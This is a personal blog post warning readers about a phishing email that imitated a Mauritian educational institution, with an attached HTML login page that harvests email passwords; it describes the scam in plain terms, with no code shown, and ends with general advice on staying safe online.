Beware : Phishing mail alert from a Mauritian educational institution!

When she received a university mail asking her to login with her email address and password to gain access to some files, my cousin immediately found something suspicious. To be sure not to miss any important mail from that Mauritian educational institution providing tertiary courses, she forwarded that said mail along with the attached login file to my mailbox.

A perfect mail

Phishing mail from Mauritian Educational Institution

As you can see above, everything is just perfect : Official mail, footer, names, telephone numbers and address. Then, I opened the attached file named ‘docfile.html’ and here’s what it looks like :

Phishing login page

What’s wrong?

Her suspicions turned right – I remember seeing something similar on Ish’s blog some time back!

Up to now, you probably might not have noticed anything alarming except that it asks for your email address and password. And probably, most unaware persons will just enter these details and click submit. Unfortunately, if you ever came across such a page and you did click on that button, I advise you to immediately change your password, if it isn’t too late already! By clicking on that damn button, the page secretly sends your email address and password to a site (either to the hacker’s site or one on which he / she placed a mechanism to collect those email details). How?

The extract below shows part of the source code found in the file and in the region I highlighted below, that’s the link to where the email details are being sent and stored without your knowledge :

Phishing - code behind

How did this happen?

As shown above, everything in the mail looks genuine. So, how did that person send you that phishing mail? Well, there are many possibilities but to keep it simple, the mail was most probably automatically been forwarded to everyone in a specific address book or computer or server which was hacked or infected with a malicious software.

In fact, that’s very similar to those pornographic content which keeps being share by your Facebook friend without his / her knowledge :

Phishing on Facebook

This mostly happens when someone downloads and installs pirated software or files from non-trusted sources. Once these malicious software are automatically installed, they secretly start infecting others in the background by sending these phishing mails or sharing similar content on social networks.

If you want to avoid having such problems, you should stop clicking on every untrusted link or software you come across on the web. Also, don’t always believe what you see on the internet. For instance, who’s that fool who gonna give away hundreds of iPhones or other free stuff to those who share their pages?

So, please use the internet wisely and carefully.

Take care,

Yashvin

You may also like...